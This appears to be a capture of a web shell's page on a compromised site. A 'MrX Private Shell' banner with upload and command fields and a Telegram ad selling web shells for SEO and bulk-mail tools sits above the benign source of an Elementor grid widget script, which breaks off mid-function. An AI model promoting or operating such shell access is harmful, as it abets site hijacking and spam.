__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
// noinspection JSUnresolvedReference,DuplicatedCode

"use strict";
(function ($) {
    $(window).on("elementor/frontend/init", () => {

        const gridHooks = [
            "frontend/element_ready/king-addons-media-grid.default"
        ];

        const gridHandler = ($scope) => {
            elementorFrontend.elementsHandler.addHandler(
                elementorModules.frontend.handlers.Base.extend({
                    onInit() {
                        const $body = $("body");
                        const isEditor = $body.hasClass("elementor-editor-active");
                        const $grid = this.$element.find(".king-addons-grid");
                        if (!$grid.length) return;

                        /* ──────────────────────────────────────
                         *  UTILITY FUNCTIONS
                         * ────────────────────────────────────── */

                        // Simple debounce helper.
                        const debounce = (func, threshold = 100, execAsap) => {
                            let timeout;
                            return function (...args) {
                                const context = this;
                                const delayed = () => {
                                    if (!execAsap) func.apply(context, args);
                                    timeout = null;
                                };
                                if (timeout) clearTimeout(timeout);
                                else if (execAsap) func.apply(context, args);
                                timeout = setTimeout(delayed, threshold);
                            };
                        };

                        // Attach "smartresize" to jQuery.
                        $.fn.smartresize = function (fn) {
                            return fn ? this.on("resize", debounce(fn)) : this.trigger("smartresize");
                        };

                        // Parse grid settings.
                        const settingsData = $grid.attr("data-settings");
                        const settings = settingsData ? JSON.parse(settingsData) : false;

                        /* ──────────────────────────────────────
                         *  INITIAL EVENT HANDLERS
                         * ────────────────────────────────────── */

                        // Handle WooCommerce orderby form.
                        if ($scope.find(".king-addons-grid-orderby form").length) {
                            const $orderbyForm = $scope.find(".king-addons-grid-orderby form");
                            $scope.find(".orderby").on("change", () => $orderbyForm.trigger("submit"));
                        }

                        // Adjust result count text if WooCommerce count element exists.
                        if (settings && $scope.find(".woocommerce-result-count").length) {
                            adjustResultCount($scope, $grid, settings, isEditor);
                        }

                        // Helper to schedule a delayed isotope layout.
                        const scheduleIsotopeLayout = (delay) =>
                            setTimeout(() => isotopeLayout(settings), delay);

                        if (settings) {
                            // Perform initial layout.
                            isotopeLayout(settings);
                            scheduleIsotopeLayout(100);
                            if (isEditor) {
                                scheduleIsotopeLayout(500);
                                scheduleIsotopeLayout(1000);
                            }
                            $(window).on("load", () => scheduleIsotopeLayout(100));
                            $(document).ready(() => scheduleIsotopeLayout(100));
                            $(window).smartresize(() => scheduleIsotopeLayout(200));

                            // If dynamic grid settings exist, set up filtering and “load more” experiments.
                            if (settings.grid_settings) {
                                loadMoreExperiment();
                                filtersExperiment();
                            }
                            isotopeFilters(settings);

                            let initialItems = 0;
                            $grid.on("arrangeComplete", (e, filteredItems) => {
                                animateGridItems(filteredItems, settings, $grid);
                                initialItems = filteredItems.length;
                            });

                            // Once images load, set grid opacity and equalize item heights.
                            $grid.imagesLoaded(() => {
                                if ($grid.css("opacity") !== "1") $grid.css("opacity", "1");
                                setTimeout(() => $grid.addClass("grid-images-loaded"), 500);
                                setEqualHeight(settings);
                            });

                            // Pagination: load-more or infinite-scroll.
                            if (["load-more", "infinite-scroll"].includes(settings.pagination_type)) {
                                if ($scope.find(".king-addons-grid-pagination").length && !isEditor) {
                                    setupInfiniteScroll(settings);
                                } else {
                                    $scope.find(".king-addons-load-more-btn").on("click", () =>
                                        alert(
                                            "Load More is Disabled in the Editor! Please Preview this Page to see it in action"
                                        )
                                    );
                                }
                            }
                        } else {
                            // Fallback: initialize Slick slider.
                            $grid.animate({opacity: "1"}, 1000);
                            initSlickSlider();
                        }

                        // Additional features.
                        if ($grid.find(".king-addons-grid-item-add-to-cart").length) {
                            setupAddToCart();
                        }
                        postSharing();
                        mediaHoverLink();
                        if (
                            !$scope.hasClass("elementor-widget-king-addons-woo-category-grid-pro") &&
                            !$scope.hasClass("elementor-widget-king-addons-category-grid-pro")
                        ) {
                            lightboxPopup(settings);
                        }
                        postLikes(settings);
                        lazyLoadObserver();

                        /* ──────────────────────────────────────
                         *  FUNCTION DEFINITIONS
                         * ────────────────────────────────────── */

                        // Adjust WooCommerce result count.
                        function adjustResultCount($scope, $grid, s, isEditor) {
                            const $resultCount = $scope.find(".woocommerce-result-count");
                            let text = $resultCount.text();
                            const scopeId = $scope.data("id");
                            const storageKey = `king-addons-cached-items-length-${scopeId}`;
                            let cachedLength = localStorage.getItem(storageKey);
                            if (!cachedLength || isEditor) {
                                cachedLength = $scope.find(".king-addons-grid-item").length;
                                localStorage.setItem(storageKey, cachedLength);
                            }
                            const itemsPerPage = s.query_posts_per_page || parseInt(cachedLength, 10);
                            if (isNaN(itemsPerPage) || itemsPerPage <= 0) return;
                            let currentPage = 1;
                            const $currentPage = $scope.find(".king-addons-grid-current-page");
                            if ($currentPage.length) {
                                currentPage = parseInt($currentPage.text().trim(), 10) || 1;
                            }
                            const totalMatch = text.match(/of (\d+) results/);
                            const totalItems = totalMatch ? parseInt(totalMatch[1].trim(), 10) : itemsPerPage;
                            if (isNaN(totalItems) || totalItems <= 0) return;
                            const startItem = (currentPage - 1) * itemsPerPage + 1;
                            const endItem = Math.min(startItem + itemsPerPage - 1, totalItems);
                            text = text.replace(/\d+\u2013\d+/, `${startItem}\u2013${endItem}`);
                            $resultCount.text(text);
                        }

                        // Layout the grid using Isotope (or its custom wrapper).
                        function isotopeLayout(s, $response = "") {
                            const layout = s.layout;
                            const columnsDesktop = parseInt(s.columns_desktop, 10);
                            let items = $response ? $response : $grid.find(".king-addons-grid-item"),
                                contWidth = $grid.width() + s.gutter_hr - 0.3,
                                viewportWidth = $(window).outerWidth(),
                                columns,
                                gutterHr,
                                gutterVr;

                            // Breakpoints.
                            const {mobile, mobile_extra, tablet, tablet_extra, laptop, widescreen} =
                                elementorFrontend.config.responsive.breakpoints;
                            const activeBps = elementorFrontend.config.responsive.activeBreakpoints;
                            let cMobile = 1,
                                cMobileExtra,
                                cTablet = 2,
                                cTabletExtra,
                                cLaptop,
                                cWideScreen;
                            $scope
                                .attr("class")
                                .split(" ")
                                .forEach((cl) => {
                                    if (/mobile\d/.test(cl)) cMobile = parseInt(cl.slice(-1), 10);
                                    if (/mobile_extra\d/.test(cl)) cMobileExtra = parseInt(cl.slice(-1), 10);
                                    if (/tablet\d/.test(cl)) cTablet = parseInt(cl.slice(-1), 10);
                                    if (/tablet_extra\d/.test(cl)) cTabletExtra = parseInt(cl.slice(-1), 10);
                                    if (/widescreen\d/.test(cl)) cWideScreen = parseInt(cl.slice(-1), 10);
                                    if (/laptop\d/.test(cl)) cLaptop = parseInt(cl.slice(-1), 10);
                                });

                            if (viewportWidth <= mobile.value && activeBps.mobile) {
                                columns = cMobile;
                                gutterHr = s.gutter_hr_mobile;
                                gutterVr = s.gutter_vr_mobile;
                            } else if (viewportWidth <= mobile_extra.value && activeBps.mobile_extra) {
                                columns = cMobileExtra || cTablet;
                                gutterHr = s.gutter_hr_mobile_extra;
                                gutterVr = s.gutter_vr_mobile_extra;
                            } else if (viewportWidth <= tablet.value && activeBps.tablet) {
                                columns = cTablet;
                                gutterHr = s.gutter_hr_tablet;
                                gutterVr = s.gutter_vr_tablet;
                            } else if (viewportWidth <= tablet_extra.value && activeBps.tablet_extra) {
                                columns = cTabletExtra || cTablet;
                                gutterHr = s.gutter_hr_tablet_extra;
                                gutterVr = s.gutter_vr_tablet_extra;
                            } else if (viewportWidth <= laptop.value && activeBps.laptop) {
                                columns = cLaptop || columnsDesktop;
                                gutterHr = s.gutter_hr_laptop;
                                gutterVr = s.gutter_vr_laptop;
                            } else if (viewportWidth <= widescreen.value) {
                                columns = columnsDesktop;
                                gutterHr = s.gutter_hr;
                                gutterVr = s.gutter_vr;
                            } else {
                                columns = cWideScreen || columnsDesktop;
                                gutterHr = s.gutter_hr_widescreen;
                                gutterVr = s.gutter_vr_widescreen;
                            }
                            if (columns > 8) columns = 8;
                            items.outerWidth(Math.floor(contWidth / columns - gutterHr));
                            items.css("margin-bottom", `${gutterVr}px`);

                            if (layout === "list") {
                                handleListLayout(s, items);
                            }

                            const isoLayoutMode = layout === "list" ? "fitRows" : layout;
                            const transDuration = s.filters_animation === "default" ? 400 : 0;

                            $grid.isotopekng({
                                layoutMode: isoLayoutMode,
                                masonry: {gutter: gutterHr},
                                fitRows: {gutter: gutterHr},
                                transitionDuration: transDuration,
                                percentPosition: true,
                            });
                        }

                        // Handle "list" layout adjustments.
                        function handleListLayout(s, items) {
                            const imageHeight = items.find(".king-addons-grid-image-wrap").outerHeight();
                            items.find(".king-addons-grid-item-below-content").css("min-height", `${imageHeight}px`);

                            if ($body.width() < 480) {
                                items.find(".king-addons-grid-media-wrap").css({float: "none", width: "100%"});
                                items.find(".king-addons-grid-item-below-content").css({
                                    float: "none",
                                    width: "100%",
                                    "min-height": "0",
                                });
                            } else {
                                const {media_align: align, media_width: mWidth, media_distance: mDistance} = s;
                                if (align === "zigzag") {
                                    handleZigzag(items, mWidth, mDistance);
                                } else {
                                    items.find(".king-addons-grid-media-wrap").css({
                                        float: align,
                                        width: `${mWidth}%`,
                                        [`margin-${align === "left" ? "right" : "left"}`]: `${mDistance}px`,
                                    });
                                    items.find(".king-addons-grid-item-below-content").css({
                                        float: align,
                                        width: `calc((100% - ${mWidth}%) - ${mDistance}px)`,
                                    });
                                }
                            }
                        }

                        // Alternate ("zigzag") layout for list items.
                        function handleZigzag(items, mWidth, mDistance) {
                            items.filter(":even").each(function () {
                                $(this).find(".king-addons-grid-media-wrap").css({
                                    float: "left",
                                    width: `${mWidth}%`,
                                    "margin-right": `${mDistance}px`,
                                });
                                $(this).find(".king-addons-grid-item-below-content").css({
                                    float: "left",
                                    width: `calc((100% - ${mWidth}%) - ${mDistance}px)`,
                                });
                            });
                            items.filter(":odd").each(function () {
                                $(this).find(".king-addons-grid-media-wrap").css({
                                    float: "right",
                                    width: `${mWidth}%`,
                                    "margin-left": `${mDistance}px`,
                                });
                                $(this).find(".king-addons-grid-item-below-content").css({
                                    float: "right",
                                    width: `calc((100% - ${mWidth}%) - ${mDistance}px)`,
                                });
                            });
                        }

                        // Equalize grid item heights for "fitRows" layout.
                        function setEqualHeight(s) {
                            if (s.layout === "fitRows") {
                                const $items = $grid.children("article");
                                const columns = Math.floor($grid.outerWidth() / $items.outerWidth());
                                if (columns > 1) {
                                    const maxH = Math.max(...$items.map((_, el) => $(el).outerHeight()).get());
                                    $items.css("height", `${maxH}px`);
                                    if (s.stick_last_element_to_bottom === "yes") {
                                        $scope.addClass("king-addons-grid-last-element-yes");
                                    }
                                }
                            }
                        }

                        // Lazy-load images via an IntersectionObserver.
                        function lazyLoadObserver() {
                            setTimeout(() => {
                                const observer = new IntersectionObserver((entries) => {
                                    entries.forEach((entry) => {
                                        if (
                                            entry.isIntersecting &&
                                            entry.target.src.includes("icon-256x256")
                                        ) {
                                            setTimeout(() => {
                                                entry.target.src =
                                                    entry.target.parentElement.dataset.src;
                                                $(entry.target).toggleClass("king-addons-hidden-image");
                                                $(window).trigger("resize");
                                            }, 100);
                                        }
                                    });
                                });
                                $scope
                                    .find(".king-addons-grid-image-wrap img:first-of-type")
                                    .each(function () {
                                        observer.observe(this);
                                    });
                            }, 100);
                        }

                        // Update filter counts and set up filtering behavior.
                        function isotopeFilters(s, ev = "load") {
                            if (s.filters_count === "yes") {
                                $scope.find(".king-addons-grid-filters a, .king-addons-grid-filters span").each(function () {
                                    const $el = $(this);
                                    if (s.grid_settings && ev === "load") {
                                        const thisTaxonomy =
                                            $el.attr("data-filter") !== "*" ? $el.data("ajax-filter")[0] : "*";
                                        const thisFilter =
                                            $el.attr("data-filter") !== "*" ? $el.data("ajax-filter")[1] : "*";
                                        $.ajax({
                                            type: "POST",
                                            url: KingAddonsGridData.ajaxUrl,
                                            data: {
                                                action: s.grid_settings
                                                    ? "king_addons_get_filtered_count"
                                                    : "king_addons_get_filtered_count",
                                                king_addons_offset: 0,
                                                king_addons_filter: thisFilter,
                                                king_addons_taxonomy: thisTaxonomy,
                                                grid_settings: s.grid_settings,
                                            },
                                            success: (response) => {
                                                $el.find("sup").text(response.data.query_found);
                                            },
                                        });
                                    } else {
                                        if ($el.attr("data-filter") === "*") {
                                            $el.find("sup").text(
                                                $scope.find(".king-addons-grid-filters").next().find("article").length
                                            );
                                        } else {
                                            $el.find("sup").text($scope.find($el.attr("data-filter")).length);
                                        }
                                    }
                                });
                            }

                            if (s.filters_linkable === "yes") return;

                            // Deep linking support.
                            if (s.deeplinking === "yes") {
                                let deepLink = window.location.hash.replace("#filter:", ".");
                                if (window.location.hash.match("#filter:all")) deepLink = "*";
                                const activeFilter = $scope
                                    .find(`.king-addons-grid-filters span[data-filter="${deepLink}"]`)
                                    .not(".king-addons-back-filter");
                                $scope.find(".king-addons-grid-filters span").removeClass("king-addons-active-filter");
                                activeFilter.addClass("king-addons-active-filter");
                                $grid.isotopekng({filter: deepLink});
                                s.lightbox.selector =
                                    deepLink === "*" ? ".king-addons-grid-image-wrap" : `${deepLink} .king-addons-grid-image-wrap`;
                                lightboxPopup(s);
                            }

                            // Hide empty filters.
                            if (s.filters_hide_empty === "yes" && !s.grid_settings) {
                                $scope.find(".king-addons-grid-filters span").each(function () {
                                    const filterClass = $(this).attr("data-filter");
                                    if (filterClass !== "*" && $grid.find(filterClass).length === 0) {
                                        $(this).parent("li").addClass("king-addons-hidden-element");
                                    } else {
                                        $(this).parent("li").removeClass("king-addons-hidden-element");
                                    }
                                });
                            }

                            // Default filter.
                            if (
                                !$scope.hasClass("elementor-widget-king-addons-woo-category-grid-pro") &&
                                !$scope.hasClass("elementor-widget-king-addons-category-grid-pro") &&
                                s.filters_default_filter
                            ) {
                                setTimeout(() => {
                                    const filterEl = $scope
                                        .find(".king-addons-grid-filters")
                                        .find(`span[data-filter*="-${s.filters_default_filter}"]`);
                                    if (filterEl.length) filterEl[0].click();
                                }, 100);
                            }

                            // Filter click behavior.
                            if (!s.grid_settings) {
                                $scope.find(".king-addons-grid-filters span").on("click", function () {
                                    const filterClass = $(this).data("filter");
                                    $scope.find(".king-addons-grid-filters span").removeClass("king-addons-active-filter");
                                    $(this).addClass("king-addons-active-filter");
                                    if (s.deeplinking === "yes") {
                                        const filterHash =
                                            filterClass === "*" ? "#filter:all" : `#filter:${filterClass.replace(".", "")}`;
                                        window.location.href =
                                            window.location.pathname + window.location.search + filterHash;
                                    }
                                    if (["infinite-scroll", "load-more"].includes(s.pagination_type)) {
                                        if ($grid.find($(this).attr("data-filter")).length === 0) {
                                            $grid.infiniteScroll("loadNextPage");
                                        }
                                    }
                                    if (s.filters_animation !== "default") {
                                        $scope.find(".king-addons-grid-item-inner").css({
                                            opacity: "0",
                                            transition: "none",
                                        });
                                        if (s.filters_animation === "fade-slide") {
                                            $scope.find(".king-addons-grid-item-inner").css("top", "20px");
                                        } else if (s.filters_animation === "zoom") {
                                            $scope.find(".king-addons-grid-item-inner").css("transform", "scale(0.01)");
                                        }
                                    }
                                    $grid.isotopekng({filter: filterClass});
                                    s.lightbox.selector =
                                        filterClass === "*" ? ".king-addons-grid-image-wrap" : `${filterClass} .king-addons-grid-image-wrap`;
                                    $grid.data("lightGallery").destroy(true);
                                    $grid.lightGallery(s.lightbox);
                                });
                            }
                        }

                        // Experiment: dynamic filtering via AJAX.
                        function filtersExperiment() {
                            const countAction = $scope.hasClass("elementor-widget-king-addons-woo-grid")
                                ? "king_addons_get_woocommerce_filtered_count"
                                : "king_addons_get_filtered_count";
                            const contentAction = $scope.hasClass("elementor-widget-king-addons-woo-grid")
                                ? "king_addons_filter_woocommerce_products"
                                : "king_addons_filter_grid_posts";

                            $scope.find(".king-addons-grid-filters").on("click", "span", function (e) {
                                e.preventDefault();
                                e.stopPropagation();
                                // e.stopImmediatePropagation();

                                const filterClass = $(this).data("filter");
                                const thisTaxonomy = filterClass !== "*" ? $(this).data("ajax-filter")[0] : "*";
                                const thisFilter = filterClass !== "*" ? $(this).data("ajax-filter")[1] : "*";
                                const loader = `<div class="king-addons-grid-loader-wrap"><div class="king-addons-ring"><div></div><div></div><div></div><div></div></div></div>`;

                                $scope.find(".king-addons-grid-filters span").removeClass("king-addons-active-filter");
                                $(this).addClass("king-addons-active-filter");

                                $grid.isotopekng("destroy");
                                $grid.html(loader);

                                $.ajax({
                                    type: "POST",
                                    url: KingAddonsGridData.ajaxUrl,
                                    data: {
                                        action: countAction,
                                        king_addons_offset:
                                            +settings.grid_settings.query_offset +
                                            $scope.find(".king-addons-grid-item").length,
                                        king_addons_filter: thisFilter,
                                        king_addons_taxonomy: thisTaxonomy,
                                        grid_settings: settings.grid_settings,
                                    },
                                    success: function () {
                                        $.ajax({
                                            type: "POST",
                                            url: KingAddonsGridData.ajaxUrl,
                                            data: {
                                                action: contentAction,
                                                king_addons_item_length:
                                                    +settings.grid_settings.query_offset +
                                                    $scope.find(".king-addons-grid-item").length,
                                                king_addons_filter: thisFilter,
                                                king_addons_taxonomy: thisTaxonomy,
                                                grid_settings: settings.grid_settings,
                                            },
                                            success: function (resp) {
                                                setTimeout(() => {
                                                    $grid.addClass("king-addons-zero-opacity");
                                                    $grid.html($(resp));
                                                    isotopeLayout(settings, $(resp));
                                                    setTimeout(() => {
                                                        isotopeLayout(settings);
                                                        window.dispatchEvent(new Event("resize"));
                                                        window.dispatchEvent(new Event("scroll"));
                                                    }, 500);
                                                    mediaHoverLink();
                                                    $grid.removeClass("king-addons-zero-opacity");
                                                }, 800);
                                            },
                                        });
                                    },
                                });
                            });
                        }

                        // Experiment: load-more via AJAX.
                        function loadMoreExperiment() {
                            const countAction = $scope.hasClass("elementor-widget-king-addons-woo-grid")
                                ? "king_addons_get_woocommerce_filtered_count"
                                : "king_addons_get_filtered_count";
                            const contentAction = $scope.hasClass("elementor-widget-king-addons-woo-grid")
                                ? "king_addons_filter_woocommerce_products"
                                : "king_addons_filter_grid_posts";
                            const $pagination = $scope.find(".king-addons-grid-pagination");

                            $scope.find(".king-addons-load-more-btn").on("click", function (e) {
                                e.preventDefault();
                                e.stopPropagation();
                                // e.stopImmediatePropagation();

                                let thisTaxonomy = "*";
                                let thisFilter = "*";
                                const $activeFilter = $scope.find(".king-addons-active-filter");
                                if ($activeFilter.length && $activeFilter.data("filter") !== "*") {
                                    thisTaxonomy = $activeFilter.data("ajax-filter")[0];
                                    thisFilter = $activeFilter.data("ajax-filter")[1];
                                }

                                $pagination.find(".king-addons-load-more-btn").hide();
                                $pagination.find(".king-addons-pagination-loading").css("display", "inline-block");

                                $.ajax({
                                    type: "POST",
                                    url: KingAddonsGridData.ajaxUrl,
                                    data: {
                                        action: countAction,
                                        king_addons_offset:
                                            +settings.grid_settings.query_offset +
                                            $grid.find(".king-addons-grid-item").length,
                                        king_addons_filter: thisFilter,
                                        king_addons_taxonomy: thisTaxonomy,
                                        grid_settings: settings.grid_settings,
                                    },
                                    success: function (res) {
                                        $.ajax({
                                            type: "POST",
                                            url: KingAddonsGridData.ajaxUrl,
                                            data: {
                                                action: contentAction,
                                                king_addons_offset:
                                                    +settings.grid_settings.query_offset +
                                                    $grid.find(".king-addons-grid-item").length,
                                                king_addons_filter: thisFilter,
                                                king_addons_taxonomy: thisTaxonomy,
                                                grid_settings: settings.grid_settings,
                                            },
                                            success: function (resp) {
                                                const $items = $(resp);
                                                $grid.infiniteScroll("appendItems", $items);
                                                $grid.isotopekng("appended", $items);
                                                $items.imagesLoaded().progress(() => {
                                                    isotopeLayout(settings);
                                                    setTimeout(() => isotopeLayout(settings), 100);
                                                    setTimeout(() => $grid.addClass("grid-images-loaded"), 500);
                                                });
                                                $pagination.find(".king-addons-pagination-loading").hide();
                                                if (res.data.page_count > 1) {
                                                    $pagination.find(".king-addons-load-more-btn").fadeIn();
                                                } else {
                                                    $pagination.find(".king-addons-pagination-finish").fadeIn(1000);
                                                    $pagination.delay(2000).fadeOut(1000);
                                                    setTimeout(() => $pagination.find(".king-addons-pagination-loading").hide(), 500);
                                                }
                                                lightboxPopup(settings);
                                                $grid.data("lightGallery").destroy(true);
                                                $grid.lightGallery(settings.lightbox);
                                                mediaHoverLink();
                                                postSharing();
                                                lazyLoadObserver();
                                                window.dispatchEvent(new Event("resize"));
                                                window.dispatchEvent(new Event("scroll"));
                                            },
                                        });
                                    },
                                });
                            });
                        }

                        // Setup Infinite Scroll.
                        function setupInfiniteScroll(s) {
                            const $pagination = $scope.find(".king-addons-grid-pagination");
                            const scopeClass = `.elementor-element-${$scope.attr("data-id")}`;
                            let navClass = false,
                                threshold = false;
                            if (s.pagination_type === "infinite-scroll") {
                                threshold = 300;
                                navClass = `${scopeClass} .king-addons-load-more-btn`;
                            }
                            $grid.infiniteScroll({
                                path: `${scopeClass} .king-addons-grid-pagination a`,
                                hideNav: navClass,
                                append: false,
                                history: false,
                                scrollThreshold: threshold,
                                status: `${scopeClass} .page-load-status`,
                                onInit() {
                                    this.on("load", () => $grid.removeClass("grid-images-loaded"));
                                },
                            });
                            $grid.on("request.infiniteScroll", () => {
                                $pagination.find(".king-addons-load-more-btn").hide();
                                $pagination.find(".king-addons-pagination-loading").css("display", "inline-block");
                            });
                            let pagesLoaded = 0;
                            $grid.on("load.infiniteScroll", (event, response) => {
                                pagesLoaded++;
                                const $items = $(response).find(scopeClass).find(".king-addons-grid-item");
                                if ($scope.find(".woocommerce-result-count").length) {
                                    let updatedCount = $scope.find(".woocommerce-result-count").text();
                                    updatedCount = updatedCount.replace(
                                        /\d\u2013\d+/,
                                        `1–${$scope.find(".king-addons-grid-item").length + $items.length}`
                                    );
                                    $scope.find(".woocommerce-result-count").text(updatedCount);
                                }
                                $grid.infiniteScroll("appendItems", $items);
                                $grid.isotopekng("appended", $items);
                                $items.imagesLoaded().progress(() => {
                                    isotopeLayout(s);
                                    setTimeout(() => {
                                        isotopeLayout(s);
                                        isotopeFilters(s);
                                    }, 10);
                                    setTimeout(() => $grid.addClass("grid-images-loaded"), 500);
                                });
                                $pagination.find(".king-addons-pagination-loading").hide();
                                if (pagesLoaded < s.pagination_max_pages) {
                                    if (s.pagination_type === "load-more") {
                                        $pagination.find(".king-addons-load-more-btn").fadeIn();
                                        if ($scope.find(".king-addons-grid-filters").length) {
                                            const activeF = $scope.find(".king-addons-active-filter");
                                            if (activeF.length && activeF.attr("data-filter") !== "*") {
                                                const filterClass = activeF.attr("data-filter").slice(1);
                                                let foundOne = false;
                                                $items.each(function () {
                                                    if ($(this).hasClass(filterClass)) {
                                                        foundOne = true;
                                                        return false;
                                                    }
                                                });
                                                if (!foundOne) $grid.infiniteScroll("loadNextPage");
                                            }
                                        }
                                    }
                                } else {
                                    $pagination.find(".king-addons-pagination-finish").fadeIn(1000);
                                    $pagination.delay(2000).fadeOut(1000);
                                    setTimeout(() => $pagination.find(".king-addons-pagination-loading").hide(), 500);
                                }
                                lightboxPopup(s);
                                $grid.data("lightGallery").destroy(true);
                                $grid.lightGallery(s.lightbox);
                                mediaHoverLink();
                                postSharing();
                                lazyLoadObserver();
                                setTimeout(() => {
                                    setEqualHeight(s);
                                    window.dispatchEvent(new Event("resize"));
                                }, 500);
                            });
                            $pagination.find(".king-addons-load-more-btn").on("click", () => {
                                $grid.infiniteScroll("loadNextPage");
                                return false;
                            });
                        }

                        // Initialize the Slick slider.
                        function initSlickSlider() {
                            const settingsSlick = JSON.parse($grid.attr("data-slick") || "{}");
                            $grid.slick({
                                appendDots: $scope.find(".king-addons-grid-slider-dots"),
                                rows: settingsSlick.sliderRows,
                                customPaging: () => `<span class="king-addons-grid-slider-dot"></span>`,
                                slidesToShow: getSliderColumns("desktop"),
                                responsive: getSliderResponsiveOptions(settingsSlick),
                            });
                            handleSlickArrows();
                            handleSlickDots();
                        }

                        // Get the number of slider columns.
                        function getSliderColumns(type) {
                            const match = $scope.attr("class").match(/king-addons-grid-slider-columns-(\d)/);
                            return type === "desktop" ? (match ? parseInt(match[1], 10) : 2) : 2;
                        }

                        // Get responsive slider options.
                        function getSliderResponsiveOptions(sl) {
                            const className = $scope.attr("class");
                            const colDesktop = getSliderColumns("desktop");
                            const colWide = extractColumns(className, "widescreen") || colDesktop;
                            const colLaptop = extractColumns(className, "laptop") || colDesktop;
                            const colTablet = extractColumns(className, "tablet") || 2;
                            const colTabletExtra = extractColumns(className, "tablet_extra") || colTablet;
                            const colMobileExtra = extractColumns(className, "mobile_extra") || colTablet;
                            const colMobile = extractColumns(className, "mobile") || 1;
                            const slidesToScroll = sl.sliderSlidesToScroll;
                            const adjust = (cols) => (slidesToScroll > cols ? 1 : slidesToScroll);
                            return [
                                {breakpoint: 10000, settings: {slidesToShow: colWide, slidesToScroll: adjust(colWide)}},
                                {
                                    breakpoint: 2399,
                                    settings: {slidesToShow: colDesktop, slidesToScroll: adjust(colDesktop)}
                                },
                                {
                                    breakpoint: 1221,
                                    settings: {slidesToShow: colLaptop, slidesToScroll: adjust(colLaptop)}
                                },
                                {
                                    breakpoint: 1200,
                                    settings: {slidesToShow: colTabletExtra, slidesToScroll: adjust(colTabletExtra)}
                                },
                                {
                                    breakpoint: 1024,
                                    settings: {slidesToShow: colTablet, slidesToScroll: adjust(colTablet)}
                                },
                                {
                                    breakpoint: 880,
                                    settings: {slidesToShow: colMobileExtra, slidesToScroll: adjust(colMobileExtra)}
                                },
                                {
                                    breakpoint: 768,
                                    settings: {slidesToShow: colMobile, slidesToScroll: adjust(colMobile)}
                                },
                            ];
                        }

                        // Extract a number of columns from a class name.
                        function extractColumns(className, type) {
                            const match = className.match(new RegExp(`columns--${type}(\\d)`));
                            return match ? parseInt(match[1], 10) : false;
                        }

                        // Adjust the slider arrows based on available space.
                        function handleSlickArrows() {
                            const $prevArrow = $scope.find(".king-addons-grid-slider-prev-arrow");
                            const $nextArrow = $scope.find(".king-addons-grid-slider-next-arrow");
                            if (!$prevArrow.length || !$nextArrow.length) return;
                            const positionSum = $prevArrow.position().left * -2;
                            $(window).on("load", checkArrows);
                            $(window).smartresize(checkArrows);

                            function checkArrows() {
                                if (
                                    $(window).width() <=
                                    $scope.outerWidth() +
                                    $prevArrow.outerWidth() +
                                    $nextArrow.outerWidth() +
                                    positionSum
                                ) {
                                    $prevArrow.addClass("king-addons-adjust-slider-prev-arrow");
                                    $nextArrow.addClass("king-addons-adjust-slider-next-arrow");
                                } else {
                                    $prevArrow.removeClass("king-addons-adjust-slider-prev-arrow");
                                    $nextArrow.removeClass("king-addons-adjust-slider-next-arrow");
                                }
                            }
                        }

                        // Adjust slider dots if needed.
                        function handleSlickDots() {
                            if (
                                $scope.find(".slick-dots").length &&
                                $scope.hasClass("king-addons-grid-slider-dots-horizontal")
                            ) {
                                resizeDots();
                                $(window).smartresize(() => setTimeout(resizeDots, 300));
                            }

                            function resizeDots() {
                                const $dots = $scope.find(".slick-dots li");
                                const marginRight = parseInt($dots.find("span").css("margin-right"), 10);
                                const width = $dots.outerWidth() * $dots.length - marginRight;
                                $scope.find(".slick-dots").css("width", width);
                            }
                        }

                        // Setup "Add to Cart" behavior.
                        function setupAddToCart() {
                            const $addCartIcon = $grid.find(".king-addons-grid-item-add-to-cart i");
                            let addCartIconClass = $addCartIcon.attr("class") || "";
                            if (addCartIconClass) {
                                addCartIconClass = addCartIconClass.substring(
                                    addCartIconClass.indexOf("fa-")
                                );
                            }
                            $body.on("adding_to_cart", (ev, btn) => btn.fadeTo("slow", 0));
                            $body.on("added_to_cart", (ev, fragments, hash, btn) => {
                                const productId = btn.data("product_id");
                                btn.next().fadeTo(700, 1).css("display", "inline-block");
                                btn.css("display", "none");
                                if (btn.data("atc-popup") === "sidebar") {
                                    $(".king-addons-mini-cart-toggle-wrap a").each(function () {
                                        const $miniCart = $(this)
                                            .closest(".king-addons-mini-cart-inner")
                                            .find(".king-addons-mini-cart");
                                        if ($miniCart.css("display") === "none") $(this).trigger("click");
                                    });
                                } else if (btn.data("atc-popup") === "popup") {
                                    addToCartPopup(btn, productId);
                                }
                                if (addCartIconClass) {
                                    btn.find("i").removeClass(addCartIconClass).addClass("fa-check");
                                    setTimeout(() => {
                                        btn.find("i").removeClass("fa-check").addClass(addCartIconClass);
                                    }, 3500);
                                }
                            });

                            function addToCartPopup(btn, productId) {
                                const $popupItem = btn.closest(".king-addons-grid-item");
                                const popupText = $popupItem.find(".king-addons-grid-item-title").text();
                                const popupLink = btn.next().attr("href");
                                const popupImageSrc = $popupItem.find(".king-addons-grid-image-wrap").data("src");
                                const popupAnimation = btn.data("atc-animation");
                                const fadeOutIn = btn.data("atc-fade-out-in");
                                const animTime = btn.data("atc-animation-time");
                                let animationClass = "king-addons-added-to-cart-default",
                                    removeAnimationClass = "king-addons-added-to-cart-popup-hide";
                                const popupImage = popupImageSrc
                                    ? `<div class="king-addons-added-tc-popup-img"><img src="${popupImageSrc}" alt="" /></div>`
                                    : "";
                                switch (popupAnimation) {
                                    case "slide-left":
                                        animationClass = "king-addons-added-to-cart-slide-in-left";
                                        removeAnimationClass = "king-addons-added-to-cart-slide-out-left";
                                        break;
                                    case "scale-up":
                                        animationClass = "king-addons-added-to-cart-scale-up";
                                        removeAnimationClass = "king-addons-added-to-cart-scale-down";
                                        break;
                                    case "skew":
                                        animationClass = "king-addons-added-to-cart-skew";
